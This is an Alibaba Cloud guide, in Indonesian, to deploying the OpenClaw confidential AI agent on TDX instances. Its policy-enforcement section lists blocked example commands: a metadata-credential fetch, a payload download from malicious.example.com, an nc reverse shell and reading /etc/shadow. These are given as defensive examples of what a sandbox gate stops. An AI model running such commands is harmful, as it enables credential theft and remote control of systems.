All Products
Search
Document Center

Elastic Compute Service:Pembuatan Satu-Klik Agen AI Rahasia OpenClaw pada Instance Komputasi Rahasia TDX g9i

Last Updated:May 30, 2026

Saat dieksekusi, Agen AI memproses percakapan pengguna, memanggil tool eksternal, mengelola memori jangka panjang, dan menangani kredensial layanan, sehingga menciptakan permukaan serangan yang jauh lebih luas dibandingkan aplikasi tradisional. Topik ini menjelaskan cara menggunakan skrip penerapan satu-klik untuk dengan cepat membangun Agen AI rahasia OpenClaw pada instance komputasi rahasia TDX Alibaba Cloud g9i. OpenClaw menggunakan API Model Studio untuk inferensi model, dikombinasikan dengan enkripsi memori tingkat perangkat keras Intel TDX, attestasi jarak jauh, dan komunikasi terenkripsi ujung ke ujung guna melindungi percakapan pengguna, status Agen, dan kredensial layanan.

Ikhtisar solusi

Topik ini menjelaskan solusi Confidential Agent. Dengan membungkus OpenClaw (Agen AI pribadi open-source) dalam lingkungan eksekusi tepercaya Intel TDX (Trust Domain Extensions), solusi ini memanfaatkan enkripsi memori tingkat perangkat keras, attestasi jarak jauh, rantai pasok yang dapat diverifikasi, dan akses terenkripsi ujung ke ujung untuk memastikan bahwa percakapan pengguna, status Agen, dan proses eksekusi tool tetap berada dalam batas yang dilindungi.

Dalam solusi ini, inferensi model disediakan oleh API Alibaba Cloud Model Studio (DashScope). Agen AI berjalan di dalam domain tepercaya Intel TDX. Input pengguna dan konteks Agen dirakit di dalam batas memori TDX, lalu OpenClaw memanggil API Model Studio melalui HTTPS untuk inferensi model. Riwayat percakapan pengguna, memori jangka panjang Agen, file SKILL, kredensial layanan, dan status platform IM semuanya tetap berada di dalam domain tepercaya TDX. Arsitektur "Confidential Agent + managed model" ini berjalan pada instance TDX tujuan umum (tidak memerlukan GPU), sehingga secara signifikan mengurangi hambatan penerapan, biaya, dan meningkatkan skalabilitas dibandingkan dengan menjalankan model besar secara lokal.

Catatan

Berbeda dengan solusi "inferensi vLLM pada instans" yang dijelaskan dalam Membangun Agen AI Rahasia OpenClaw pada Instance Komputasi Rahasia Heterogen, solusi ini tidak menerapkan layanan inferensi model besar di dalam instans TDX. Prompt dan respons inferensi model dikirim ke API Model Studio melalui HTTPS. API Model Studio disediakan oleh Alibaba Cloud dan mematuhi komitmen perlindungan data Alibaba Cloud, tetapi konten prompt meninggalkan batas enkripsi perangkat keras instans TDX. Jika Anda memerlukan agar "data tidak pernah meninggalkan TEE" juga selama proses inferensi, gunakan solusi inferensi vLLM pada instans.

Arsitektur keamanan

Semua data inti dalam penerapan Confidential Agent mengalir di dalam batas TEE (Trusted Execution Environment). Aset berikut dilindungi:

Aset yang dilindungi

Deskripsi

Privasi percakapan pengguna

Input pengguna, konteks eksekusi tool, dan respons AI, yang mungkin berisi informasi identitas pribadi, data medis, data keuangan, dan informasi sensitif lainnya.

Memori dan status Agen

Memori jangka panjang OpenClaw, konfigurasi, dan file SKILL, yang seiring waktu menjadi target bernilai tinggi.

Kredensial layanan

Kunci API Model Studio DashScope, kredensial OAuth DingTalk, dan Token Gerbang OpenClaw. Kebocoran kredensial ini dapat menyebabkan pengambilalihan layanan atau penyalahgunaan kuota.

Arsitektur keamanan mencakup lima lapisan dari bawah ke atas: perangkat keras, rantai boot, waktu proses, manajemen kunci, dan komunikasi:

Lapisan perlindungan

Mekanisme

Perangkat keras

Intel TDX secara transparan mengenkripsi seluruh memori Guest OS. Platform cloud dan mesin host tidak dapat membaca data teks biasa.

Rantai boot

UKI (Unified Kernel Image) dan rootfs dm-verity memberikan perlindungan terhadap perubahan. Pengukuran gambar diunggah ke log transparansi Rekor.

Waktu proses

cai-pep (Policy Enforcement Point) menerapkan intersepsi kebijakan untuk perintah berisiko tinggi, path sensitif, dan akses jaringan.

Manajemen kunci

Kunci enkripsi disk, konfigurasi OpenClaw, kredensial DingTalk, dan kunci API Model Studio hanya disuntikkan setelah attestasi jarak jauh berhasil.

Komunikasi

Enkripsi ujung ke ujung RATS-TLS. Saluran hanya dibentuk setelah attestasi jarak jauh memverifikasi identitas instans. Seluruh komunikasi dienkripsi saat transit.

Arsitektur penerapan

Proses penerapan adalah sebagai berikut:

  1. Siapkan kredensial: Ekspor AccessKey Alibaba Cloud, kunci API Model Studio, dan (opsional) kredensial DingTalk pada mesin deploy.

  2. Penerapan satu-klik: Jalankan skrip penerapan satu-klik, yang secara otomatis menginstal dependensi, membangun gambar tepercaya, mengunggah nilai referensi, membuat sumber daya cloud, melakukan attestasi jarak jauh, dan menyuntikkan rahasia.

  3. Buat saluran terenkripsi: Skrip secara otomatis memulai tunnel TNG connect untuk membentuk saluran terenkripsi RATS-TLS antara mesin deploy dan instans TDX.

  4. Akses layanan: Akses OpenClaw melalui DingTalk, Web, klien desktop, atau TUI. Seluruh traffic masuk ke instans TDX melalui saluran terenkripsi RATS-TLS.

Prasyarat

  • ECS Alibaba Cloud telah diaktifkan, dan akun memiliki izin untuk membuat instans komputasi rahasia TDX, VPC, vSwitch, security group, bucket OSS, dan gambar kustom.

  • Instance ECS Alibaba Cloud Linux 3 telah disiapkan sebagai mesin deploy, dengan ruang disk tersedia minimal 80 GB.

    Penting

    Mesin deploy hanya digunakan untuk operasi build dan penerapan. Skrip satu-klik secara otomatis membuat instans komputasi rahasia TDX baru untuk menjalankan layanan OpenClaw. Mesin deploy itu sendiri tidak perlu menjadi instans TDX.

  • Kredensial akses Alibaba Cloud telah diperoleh. Kami merekomendasikan agar Anda menggunakan Pengguna RAM dengan hak istimewa minimal, Peran RAM, atau kredensial sementara STS alih-alih menyimpan Pasangan Kunci Akses akun utama dalam jangka panjang.

  • Alibaba Cloud Model Studio telah diaktifkan dan kunci API DashScope telah diperoleh.

  • (Opsional) Jika Anda ingin menggunakan integrasi DingTalk, aplikasi enterprise internal DingTalk telah dibuat dan Client ID serta Client Secret telah diperoleh.

  • Mesin deploy memiliki akses Internet untuk mengambil kode sumber, paket sistem, Node.js, paket npm, log transparansi Rekor, dan OpenAPI Alibaba Cloud.

Prosedur

Catatan

Topik ini menggunakan tipe instans ecs.g9i.xlarge, wilayah cn-beijing, dan zona cn-beijing-i sebagai konfigurasi default.

Langkah 1: Siapkan kredensial

Skrip penerapan satu-klik memerlukan AccessKey Alibaba Cloud untuk membuat sumber daya cloud (instans ECS, VPC, security group, dll.) dan kunci API Model Studio untuk menyediakan kemampuan inferensi model bagi OpenClaw. Jalankan perintah berikut pada mesin deploy untuk mengekspor kredensial sebagai Variabel lingkungan.

export ALICLOUD_ACCESS_KEY="<YOUR_ACCESS_KEY>"
export ALICLOUD_SECRET_KEY="<YOUR_SECRET_KEY>"
export DASHSCOPE_API_KEY="<YOUR_DASHSCOPE_API_KEY>"

Ganti placeholder pada perintah di atas dengan nilai aktual. Tabel berikut menjelaskan parameter tersebut.

Placeholder

Deskripsi

Cara memperoleh

<YOUR_ACCESS_KEY>

ID AccessKey Alibaba Cloud

Lihat Buat Pasangan AccessKey.

<YOUR_SECRET_KEY>

Secret AccessKey Alibaba Cloud

Dibuat bersamaan dengan ID AccessKey.

<YOUR_DASHSCOPE_API_KEY>

Kunci API Model Studio DashScope

Peroleh dari Konsol Model Studio.

Penting

Kami merekomendasikan agar Anda menggunakan Pengguna RAM dengan hak istimewa minimal atau kredensial sementara STS alih-alih menyimpan Pasangan Kunci Akses akun utama dalam jangka panjang.

Jika Anda ingin mengaktifkan integrasi DingTalk, jalankan perintah berikut:

export DINGTALK_BOT_CLIENT_ID="<YOUR_DINGTALK_CLIENT_ID>"
export DINGTALK_BOT_CLIENT_SECRET="<YOUR_DINGTALK_CLIENT_SECRET>"

Di mana <YOUR_DINGTALK_CLIENT_ID> dan <YOUR_DINGTALK_CLIENT_SECRET> adalah Client ID dan Client Secret aplikasi enterprise internal DingTalk Anda. Peroleh dari Portal Pengembang DingTalk setelah membuat aplikasi.

Langkah 2: Jalankan penerapan satu-klik

Jalankan perintah berikut pada mesin deploy untuk memulai penerapan interaktif:

curl -fsSL https://raw.githubusercontent.com/inclavare-containers/confidential-agent/one-click/one-click/install.sh | sh

Skrip secara default masuk ke mode interaktif dan meminta kredensial Alibaba Cloud yang belum dimasukkan, kunci API Model Studio, kredensial DingTalk, Token Gerbang OpenClaw, dan CIDR operator. Konfigurasi default umum tercantum sebagai berikut:

Item konfigurasi

Nilai default

Deskripsi

Wilayah

cn-beijing

Wilayah Alibaba Cloud.

Zona

cn-beijing-i

Zona yang mendukung tipe instans TDX.

Tipe Instans

ecs.g9i.xlarge

Tipe instans TDX default.

Disk Sistem

200G

Ruang disk yang diperlukan untuk gambar OpenClaw dan status waktu proses.

Versi OpenClaw

2026.5.7

Versi OpenClaw.

Versi Node.js

22.19.0

Versi Node.js untuk waktu proses OpenClaw.

Registri npm

https://registry.npmmirror.com/

Registri npm yang digunakan untuk membangun gambar OpenClaw.

Nilai Referensi

rekor

Setelah build, nilai referensi diunggah ke Rekor dan digunakan untuk verifikasi selama penerapan.

Dir Status

$HOME/.confidential-agent

Direktori status lokal, kunci, Terraform, dan artefak build.

Skrip satu-klik secara otomatis mendeteksi IP publik mesin deploy dan meminta CIDR akses operator dalam mode interaktif:

Opsi

Deskripsi

Skenario yang berlaku

IP publik mesin deploy /32

Hanya mesin deploy saat ini yang dapat mengakses lapisan kontrol, API status, SSH debug, dan port connect.

Disarankan secara default. Cocok untuk produksi dan pengujian.

0.0.0.0/0

Semua sumber IPv4 dapat mengakses port yang diekspos operator.

Demo sementara atau lingkungan jaringan terkendali.

Penting

0.0.0.0/0 meningkatkan permukaan serangan. Secara default, OpenClaw menonaktifkan autentikasi perangkat, dan lapisan kontrol hanya mengandalkan otentikasi Token Gerbang. Saat digunakan dengan 0.0.0.0/0, perlakukan Token sebagai kredensial yang sangat sensitif. Di lingkungan produksi, batasi ke IP publik tertentu atau CIDR egress enterprise.

Contoh penerapan non-interaktif:

curl -fsSL https://raw.githubusercontent.com/inclavare-containers/confidential-agent/one-click/one-click/install.sh | sh -s -- deploy-openclaw \
  --non-interactive \
  --yes \
  --region cn-beijing \
  --zone-id cn-beijing-i \
  --instance-type ecs.g9i.xlarge \
  --disk-gb 200 \
  --enable-dingtalk

Untuk hanya menginstal dependensi lokal dan membangun komponen Confidential Agent serta gambar tool tanpa membuat sumber daya cloud, jalankan perintah berikut:

curl -fsSL https://raw.githubusercontent.com/inclavare-containers/confidential-agent/one-click/one-click/install.sh | sh -s -- install-only

Contoh spesifikasi CIDR non-interaktif:

curl -fsSL https://raw.githubusercontent.com/inclavare-containers/confidential-agent/one-click/one-click/install.sh | sh -s -- deploy-openclaw \
  --non-interactive \
  --yes \
  --allowed-cidr 203.0.113.10/32

Langkah 3: Tunggu penerapan dan konfirmasi

Skrip secara otomatis melakukan tindakan berikut:

  1. Menginstal dependensi mesin deploy.

  2. Membangun confidential-agent, confidential-agentd, dan cai-pep, serta menginstal confidential-agent ke /usr/local/bin.

  3. Membangun confidential-agent-tools:latest dan menginstal CLI OpenClaw yang sesuai dengan versi dalam gambar pada mesin deploy.

  4. Membangun gambar tepercaya OpenClaw dengan FDE, dm-verity, dan UKI diaktifkan.

  5. Mengunggah nilai referensi gambar ke log transparansi Rekor.

  6. Membuat sumber daya Alibaba Cloud dan meluncurkan instans ECS TDX.

  7. Setelah attestasi jarak jauh berhasil, menyuntikkan konfigurasi OpenClaw, kunci API Model Studio, kredensial DingTalk, dan Token Gerbang.

  8. Memulai tunnel TNG connect lokal dan melakukan pemeriksaan keterjangkauan web, probe WebSocket Gerbang, dan probe chat. Probe chat menggunakan respons API Model Studio yang nyata sebagai konfirmasi ketersediaan ujung ke ujung.

Setelah penerapan berhasil, skrip menghasilkan informasi serupa berikut:

Ringkasan satu-klik Confidential Agent
  state_dir: /root/.confidential-agent
  work_dir:  /root/.confidential-agent/one-click
  service:   openclaw
  region:    cn-beijing
  zone_id:   cn-beijing-i
  instance:  ecs.g9i.xlarge
  cidr:      203.0.113.10/32
  dingtalk:  1
  token:     <generated-or-provided-token>
  web:       http://127.0.0.1:18789/openclaw
  ws/api:    ws://127.0.0.1:18789
  tui:       openclaw tui --url ws://127.0.0.1:18789 --token "<generated-or-provided-token>"
Catatan

Token Gerbang disimpan di $HOME/.confidential-agent/one-click/secrets/gateway.token. Eksekusi berikutnya menggunakan Token yang sama. Untuk memutar ulang token, hapus file ini dan jalankan kembali skrip.

Langkah 4: Akses layanan OpenClaw

Setelah layanan siap, Anda dapat mengakses OpenClaw melalui empat metode berikut. Seluruh traffic masuk ke instans TDX melalui saluran TNG RATS-TLS.

Metode 1: Chat DingTalk

Temukan bot yang dikonfigurasi di DingTalk dan kirim pesan untuk memulai percakapan dengan OpenClaw.

image

Metode 2: Browser web

Jika browser berjalan pada mesin deploy, akses URL berikut secara langsung:

http://127.0.0.1:18789/openclaw

Jika browser berjalan pada komputer pribadi, pertama-tama jalankan perintah berikut pada komputer pribadi untuk membuat penerusan port SSH:

ssh -L 18789:127.0.0.1:18789 root@<DEPLOY_MACHINE_PUBLIC_IP>

Di mana <DEPLOY_MACHINE_PUBLIC_IP> adalah Alamat IP publik mesin deploy.

Kemudian akses http://127.0.0.1:18789/openclaw di browser dan masukkan Token Gerbang dari Langkah 3.

image

Metode 3: Klien desktop OpenClaw

Instal klien desktop OpenClaw pada komputer pribadi dan konfigurasikan mode Remote:

Item konfigurasi

Nilai

URL Server

ws://127.0.0.1:18789

Token

Token Gerbang dari Langkah 3

Jika klien desktop tidak berjalan pada mesin deploy, pertama-tama buat penerusan port SSH:

ssh -L 18789:127.0.0.1:18789 root@<DEPLOY_MACHINE_PUBLIC_IP>

Di mana <DEPLOY_MACHINE_PUBLIC_IP> adalah Alamat IP publik mesin deploy.

Metode 4: TUI OpenClaw

Skrip satu-klik menginstal CLI OpenClaw yang sesuai dengan gambar cloud pada mesin deploy. Jalankan perintah berikut untuk memulai TUI:

openclaw tui --url ws://127.0.0.1:18789 --token <YOUR_GATEWAY_TOKEN>

Di mana <YOUR_GATEWAY_TOKEN> adalah Token Gerbang yang dihasilkan setelah penerapan pada Langkah 3.

Catatan

Saat menghubungkan melalui TUI untuk pertama kalinya, jika ditampilkan pairing required, akses http://127.0.0.1:18789/openclaw di browser, temukan perangkat yang tertunda di halaman node, klik Approve, lalu kembali ke TUI.

Langkah 5 (Opsional): Lepaskan sumber daya

Saat layanan tidak lagi diperlukan, jalankan perintah berikut pada mesin deploy untuk melepaskan sumber daya cloud:

curl -fsSL https://raw.githubusercontent.com/inclavare-containers/confidential-agent/one-click/one-click/install.sh | sh -s -- cleanup \
  --state-dir "$HOME/.confidential-agent"
Peringatan

Operasi pembersihan tidak dapat dikembalikan. Operasi ini menghapus instans ECS, gambar kustom, objek OSS, security group, VPC, vSwitch, dan sumber daya cloud lainnya. Pastikan Anda tidak lagi memerlukan data dalam instans sebelum menjalankan perintah ini.

Verifikasi keamanan

Verifikasi lingkungan eksekusi tepercaya

OpenClaw memiliki skill bawaan tdx-remote-attestation. Saat ditanya pertanyaan terkait keamanan, skill ini secara otomatis memicu attestasi jarak jauh untuk memverifikasi status keamanan lingkungan eksekusi saat ini.

Metode pemicu: Ajukan pertanyaan terkait keamanan di DingTalk, Web, atau TUI, seperti "Apakah data saya aman?", "Apakah lingkungan ini tepercaya?", atau "Verifikasi lingkungan eksekusi TDX saat ini."

Konten yang dikembalikan:

Item verifikasi

Deskripsi

Status kepercayaan perangkat keras

Nilai perangkat keras 32 atau lebih rendah menunjukkan verifikasi berhasil

Tipe TEE

Domain Tepercaya Intel TDX

Enkripsi memori

Menegaskan bahwa mesin enkripsi memori diaktifkan

Integritas rantai boot UKI

Verifikasi konsistensi pengukuran komponen

Verifikasi penerapan kebijakan PEP

cai-pep adalah mekanisme gerbang waktu proses yang dirancang untuk Agen AI rahasia. Saat OpenClaw mengeksekusi perintah melalui tool exec, permintaan melewati cai-pep untuk pencocokan kebijakan sebelum memasuki sandbox Docker terisolasi.

PEP menyediakan tiga lapisan perlindungan:

  1. Intersepsi tingkat perintah: Memblokir perintah berisiko tinggi berdasarkan daftar blokir, seperti curl, wget, nc, ssh, dan docker.

  2. Intersepsi tingkat path: Memblokir akses ke path sensitif, seperti /etc, /proc, /root, dan direktori konfigurasi OpenClaw.

  3. Isolasi jaringan: Sandbox tidak memiliki izin jaringan secara default, mencegah koneksi keluar bahkan jika perintah melewati daftar blokir.

Perintah berikut diblokir oleh PEP:

Tipe

Contoh perintah

Alasan intersepsi

Akses jaringan

curl http://169.254.169.254/latest/meta-data/

Mencegah kebocoran kredensial melalui layanan metadata cloud.

Akses jaringan

wget http://malicious.example.com/payload

Mencegah pengunduhan kode berbahaya eksternal.

Reverse shell

nc 10.0.0.99 4444 -e /bin/bash

nc ada dalam daftar blokir perintah.

Login jarak jauh

ssh root@external-host

Mencegah akses tidak sah ke sistem eksternal.

Operasi kontainer

docker ps

Mencegah pengoperasian kontainer host.

Path sensitif

cat /etc/shadow

/etc/shadow cocok dengan awalan path sensitif.

Sebagai contoh, saat Agen mencoba menjalankan perintah berikut untuk mengakses layanan metadata cloud:

Run: curl http://169.254.169.254/latest/meta-data/

PEP mengidentifikasi bahwa curl ada dalam daftar blokir perintah, segera menolak permintaan dan mengembalikan pesan penolakan, mencegah kebocoran kredensial.

Verifikasi integritas rantai pasok

Proses penerapan secara default menggunakan log transparansi Rekor untuk menyimpan nilai referensi gambar. Selama attestasi jarak jauh, sistem secara otomatis mengambil entri log dari Rekor untuk verifikasi. Anda dapat mengaudit entri log Rekor melalui metode berikut untuk memverifikasi integritas rantai pasok.

Lihat catatan Rekor

Setelah build selesai, Anda dapat menemukan metadata Rekor di direktori status:

find "$HOME/.confidential-agent" -name "*.rekor-meta.json" -print

Setiap entri sesuai dengan provenance SLSA, berisi indeks log dan URL entri. Contoh log unggah Rekor dari skrip satu-klik:

Entri dibuat pada indeks 1205944956, tersedia di: https://rekor.sigstore.dev/api/v1/log/entries/<uuid>

Verifikasi bukti inklusi

Bukti inklusi memverifikasi bahwa entri yang mencatat nilai referensi gambar benar-benar ada dalam Merkle Root Rekor.

rekor-cli verify --log-index 1205944956 --rekor_server https://rekor.sigstore.dev

Jika output berisi dua nilai hash yang identik, verifikasi berhasil:

Computed Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090
Expected Root Hash: 1291abcee27148a4c00241ba8719f798ce060e8a5ccc8b18249017c25c6d0090

Verifikasi bukti konsistensi

Bukti konsistensi memverifikasi bahwa Merkle Root lama (Root A) merupakan awalan atau status historis dari Merkle Root baru (Root B), memastikan bahwa entri nilai referensi yang disimpan di Rekor tidak dihapus atau dimodifikasi.

rekor-cli loginfo --rekor_server https://rekor.sigstore.dev

Jika output berisi konten berikut, verifikasi berhasil:

Verification Successful!

Catatan penggunaan

Aturan security group

Aturan security group dibuat secara otomatis selama penerapan satu-klik. Jika Anda perlu mengubahnya nanti, pastikan port berikut tetap dipertahankan:

Port

Protokol

Deskripsi

Rekomendasi

22

TCP

Manajemen jarak jauh SSH (Hanya untuk gambar Debug)

Batasi IP sumber ke jaringan manajemen.

18789

TCP

Titik akhir tunnel TNG (RATS-TLS) untuk mengakses layanan OpenClaw

Batasi IP sumber atau akses hanya melalui TNG.

Penting

CIDR operator default adalah IP publik mesin deploy dengan /32. Jika Anda secara manual menentukan 0.0.0.0/0, kurangi risiko eksposur token dan ubah ke IP publik tertentu atau CIDR egress enterprise di lingkungan produksi.

Kunci API Model Studio dan kuota

Kunci API Model Studio menentukan model dan kuota yang tersedia untuk instans. Rekomendasi:

  1. Gunakan kunci API dengan kuota minimum yang diperlukan. Hindari menggunakan kunci akun utama.

  2. Putar ulang secara berkala setelah penyuntikan: hapus secrets/gateway.token, ekspor ulang DASHSCOPE_API_KEY, dan jalankan kembali skrip satu-klik.

  3. Gunakan fitur audit akses di Konsol Model Studio untuk mengatur peringatan volume panggilan abnormal.

FAQ

peering 'ops' already exists with a different CIDR

Penyebab: Peering operator dengan CIDR berbeda sudah ada di direktori status saat ini.

Solusi: Berikan --allowed-cidr yang sesuai dengan peering yang ada, konfirmasi penggantian dalam mode interaktif, atau tambahkan --yes dalam mode non-interaktif.

Shelter is required atau SLSA generator is required

Penyebab: Shelter tidak terinstal pada mesin deploy, atau mode Rekor tidak dapat menemukan generator SLSA.

Solusi:

  • Verifikasi bahwa shelter-*.rpm ada di direktori hack/, atau tentukan path RPM dengan --shelter-rpm.

  • Instal ulang RPM Shelter dan verifikasi bahwa /usr/libexec/shelter/slsa/slsa-generator ada.

  • Untuk pengembangan dan pengujian lokal saja, gunakan --reference-values sample untuk melewati proses Rekor.

Port web tidak dapat diakses

Penyebab dan troubleshooting:

  1. Periksa connect.log: tail -F "$HOME/.confidential-agent/one-click/connect.log".

  2. Verifikasi bahwa security group instans ECS mengizinkan peerings operator ops dan deployer.

  3. Jika IP publik mesin deploy berubah, jalankan kembali skrip satu-klik, atau jalankan peering remove deployer dan tambahkan peering deployer baru dengan IP baru.

Chat probe gagal

Penyebab: Karena inferensi dalam solusi ini dilakukan oleh API Model Studio, kegagalan chat probe biasanya terkait konfigurasi Model Studio.

Solusi:

  1. Verifikasi bahwa DASHSCOPE_API_KEY benar dan aktif.

  2. Periksa apakah model yang dipilih tersedia dan tidak dalam kondisi tunggakan di Konsol Model Studio.

  3. Login ke guest melalui SSH debug dan periksa log gateway OpenClaw.

DingTalk tidak merespons

Penyebab dan troubleshooting:

  1. Verifikasi bahwa --enable-dingtalk diberikan selama penerapan atau DingTalk diaktifkan dalam mode interaktif.

  2. Periksa apakah openclaw status pada guest menunjukkan saluran DingTalk sebagai ON.

  3. Periksa journalctl -u cai-openclaw-gateway.service -n 200 --no-pager untuk kesalahan koneksi dingtalk. Jika muncul HTTP 401, verifikasi bahwa Client ID dan Client Secret DingTalk sesuai dengan yang ada di DingTalk Open Platform.

  4. Verifikasi bahwa aplikasi DingTalk memiliki izin yang diperlukan untuk mengirim dan menerima pesan.

cai-pep menolak semua pemanggilan tool

Penyebab: Konfigurasi kebijakan PEP tidak normal atau layanan belum dimulai dengan benar.

Solusi: Setelah menerapkan dengan gambar Debug, login ke instans TDX melalui SSH dan periksa log cai-pep untuk alasan intersepsi spesifik:

journalctl -u cai-pep.service -n 200 --no-pager

Referensi